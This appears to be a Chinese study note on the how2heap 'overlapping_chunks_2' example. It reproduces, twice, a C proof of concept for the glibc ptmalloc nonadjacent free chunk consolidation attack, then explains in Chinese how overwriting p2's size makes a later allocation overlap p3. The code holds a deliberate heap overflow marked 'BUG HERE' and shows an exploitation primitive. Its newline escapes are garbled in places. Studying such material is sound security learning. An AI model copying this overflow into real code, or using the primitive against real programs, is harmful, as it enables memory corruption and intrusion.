10.overlapping_chunks_2

源代码

复制代码 1 /* 2 Yet another simple tale of overlapping chunk. 3 4 This technique is taken from 5 https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf. 6 7 This is also referenced as Nonadjacent Free Chunk Consolidation Attack. 8 9 */ 10 11 #include <stdio.h> 12 #include <stdlib.h> 13 #include <string.h> 14 #include <stdint.h> 15 #include <malloc.h> 16 17 int main(){ 18 19 intptr_t *p1,*p2,*p3,*p4,*p5,*p6; 20 unsigned int real_size_p1,real_size_p2,real_size_p3,real_size_p4,real_size_p5,real_size_p6; 21 int prev_in_use = 0x1; 22 23 fprintf(stderr, "nThis is a simple chunks overlapping problem"); 24 fprintf(stderr, "nThis is also referenced as Nonadjacent Free Chunk Consolidation Attackn"); 25 fprintf(stderr, "nLet's start to allocate 5 chunks on the heap:"); 26 27 p1 = malloc(1000); 28 p2 = malloc(1000); 29 p3 = malloc(1000); 30 p4 = malloc(1000); 31 p5 = malloc(1000); 32 33 real_size_p1 = malloc_usable_size(p1); 34 real_size_p2 = malloc_usable_size(p2); 35 real_size_p3 = malloc_usable_size(p3); 36 real_size_p4 = malloc_usable_size(p4); 37 real_size_p5 = malloc_usable_size(p5); 38 39 fprintf(stderr, "nnchunk p1 from %p to %p", p1, (unsigned char *)p1+malloc_usable_size(p1)); 40 fprintf(stderr, "nchunk p2 from %p to %p", p2, (unsigned char *)p2+malloc_usable_size(p2)); 41 fprintf(stderr, "nchunk p3 from %p to %p", p3, (unsigned char *)p3+malloc_usable_size(p3)); 42 fprintf(stderr, "nchunk p4 from %p to %p", p4, (unsigned char *)p4+malloc_usable_size(p4)); 43 fprintf(stderr, "nchunk p5 from %p to %pn", p5, (unsigned char *)p5+malloc_usable_size(p5)); 44 45 memset(p1,'A',real_size_p1); 46 memset(p2,'B',real_size_p2); 47 memset(p3,'C',real_size_p3); 48 memset(p4,'D',real_size_p4); 49 memset(p5,'E',real_size_p5); 50 51 fprintf(stderr, "nLet's free the chunk p4.nIn this case this isn't coealesced with top chunk since we have p5 bordering top chunk after p4n"); 52 53 free(p4); 54 55 fprintf(stderr, "nLet's trigger the vulnerability on chunk p1 that overwrites the size of the in use chunk p2nwith the size of chunk_p2 + size of chunk_p3n"); 56 57 *(unsigned int *)((unsigned char *)p1 + real_size_p1 ) = real_size_p2 + real_size_p3 + prev_in_use + sizeof(size_t) * 2; //<--- BUG HERE 58 59 fprintf(stderr, "nNow during the free() operation on p2, the allocator is fooled to think that nthe nextchunk is p4 ( since p2 + size_p2 now point to p4 ) n"); 60 fprintf(stderr, "nThis operation will basically create a big free chunk that wrongly includes p3n"); 61 free(p2); 62 63 fprintf(stderr, "nNow let's allocate a new chunk with a size that can be satisfied by the previously freed chunkn"); 64 65 p6 = malloc(2000); 66 real_size_p6 = malloc_usable_size(p6); 67 68 fprintf(stderr, "nOur malloc() has been satisfied by our crafted big free chunk, now p6 and p3 are overlapping and nwe can overwrite data in p3 by writing on chunk p6n"); 69 fprintf(stderr, "nchunk p6 from %p to %p", p6, (unsigned char *)p6+real_size_p6); 70 fprintf(stderr, "nchunk p3 from %p to %pn", p3, (unsigned char *) p3+real_size_p3); 71 72 fprintf(stderr, "nData inside chunk p3: nn"); 73 fprintf(stderr, "%sn",(char *)p3); 74 75 fprintf(stderr, "nLet's write something inside p6n"); 76 memset(p6,'F',1500); 77 78 fprintf(stderr, "nData inside chunk p3: nn"); 79 fprintf(stderr, "%sn",(char *)p3); 80 81 82 }

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
/*
 Yet another simple tale of overlapping chunk.

 This technique is taken from

https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf.

 This is also referenced as Nonadjacent Free Chunk Consolidation Attack.

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

int main(){


intptr_t *p1,*p2,*p3,*p4,*p5,*p6;

unsigned int real_size_p1,real_size_p2,real_size_p3,real_size_p4,real_size_p5,real_size_p6;

int prev_in_use = 0x1;


fprintf(stderr, "nThis is a simple chunks overlapping problem");

fprintf(stderr, "nThis is also referenced as Nonadjacent Free Chunk Consolidation Attackn");

fprintf(stderr, "nLet's start to allocate 5 chunks on the heap:");


p1 = malloc(1000);

p2 = malloc(1000);

p3 = malloc(1000);

p4 = malloc(1000);

p5 = malloc(1000);


real_size_p1 = malloc_usable_size(p1);

real_size_p2 = malloc_usable_size(p2);

real_size_p3 = malloc_usable_size(p3);

real_size_p4 = malloc_usable_size(p4);

real_size_p5 = malloc_usable_size(p5);


fprintf(stderr, "nnchunk p1 from %p to %p", p1, (unsigned char *)p1+malloc_usable_size(p1));

fprintf(stderr, "nchunk p2 from %p to %p", p2,
(unsigned char *)p2+malloc_usable_size(p2));

fprintf(stderr, "nchunk p3 from %p to %p", p3,
(unsigned char *)p3+malloc_usable_size(p3));

fprintf(stderr, "nchunk p4 from %p to %p", p4, (unsigned char *)p4+malloc_usable_size(p4));

fprintf(stderr, "nchunk p5 from %p to %pn", p5,
(unsigned char *)p5+malloc_usable_size(p5));


memset(p1,'A',real_size_p1);

memset(p2,'B',real_size_p2);

memset(p3,'C',real_size_p3);

memset(p4,'D',real_size_p4);

memset(p5,'E',real_size_p5);


fprintf(stderr, "nLet's free the chunk p4.nIn this case this isn't coealesced with top chunk since we have p5 bordering top chunk after p4n");


free(p4);


fprintf(stderr, "nLet's trigger the vulnerability on chunk p1 that overwrites the size of the in use chunk p2nwith the size of chunk_p2 + size of chunk_p3n");


*(unsigned int *)((unsigned char *)p1 + real_size_p1 ) = real_size_p2 + real_size_p3 + prev_in_use + sizeof(size_t) * 2; //<--- BUG HERE 


fprintf(stderr, "nNow during the free() operation on p2, the allocator is fooled to think that nthe nextchunk is p4 ( since p2 + size_p2 now point to p4 ) n");

fprintf(stderr, "nThis operation will basically create a big free chunk that wrongly includes p3n");

free(p2);


fprintf(stderr, "nNow let's allocate a new chunk with a size that can be satisfied by the previously freed chunkn");


p6 = malloc(2000);

real_size_p6 = malloc_usable_size(p6);


fprintf(stderr, "nOur malloc() has been satisfied by our crafted big free chunk, now p6 and p3 are overlapping and nwe can overwrite data in p3 by writing on chunk p6n");

fprintf(stderr, "nchunk p6 from %p to %p", p6,
(unsigned char *)p6+real_size_p6);

fprintf(stderr, "nchunk p3 from %p to %pn", p3, (unsigned char *) p3+real_size_p3);


fprintf(stderr, "nData inside chunk p3: nn");

fprintf(stderr, "%sn",(char *)p3);


fprintf(stderr, "nLet's write something inside p6n");

memset(p6,'F',1500);


fprintf(stderr, "nData inside chunk p3: nn");

fprintf(stderr, "%sn",(char *)p3);


}

运行结果

 

首先申请5个1000字节的堆p1，p2，p3，p4，p5

将5个堆都赋值上A,B,C,D,E以区分

这里因为字节对齐，又造成了每个堆使用了下个堆的prev_size字段

 

接着释放p4，由于后面有p5，所以不担心和top chunk合并

然后修改p2的size=1000+1000+0x10+1

现在&p2+p2->size=&p4

libc判断p2的下一个堆块为p4，忽略了p3

l将误以为原来的p2+p3这一段内存为一个新的堆p2（这里没有注意到p4的prev_size字段）

然后将p2释放

由于p4处于释放状态，所以p4和p2合并

p3被覆盖在新合并的堆中

申请一个2000字节的堆p6，即使用这个新合并的堆

p3被包含在p6中，又造成了overlapping

修改p6内容即可修改p3内容

 与之前的overlapping相比

之前的是释放后修改size，重新申请后覆盖了后面的堆

这个是先修改size,使之大小覆盖了后面的堆，再释放后和已释放的后后个堆合并，包含了要覆盖的堆

重新申请后即可覆盖包含的堆的内容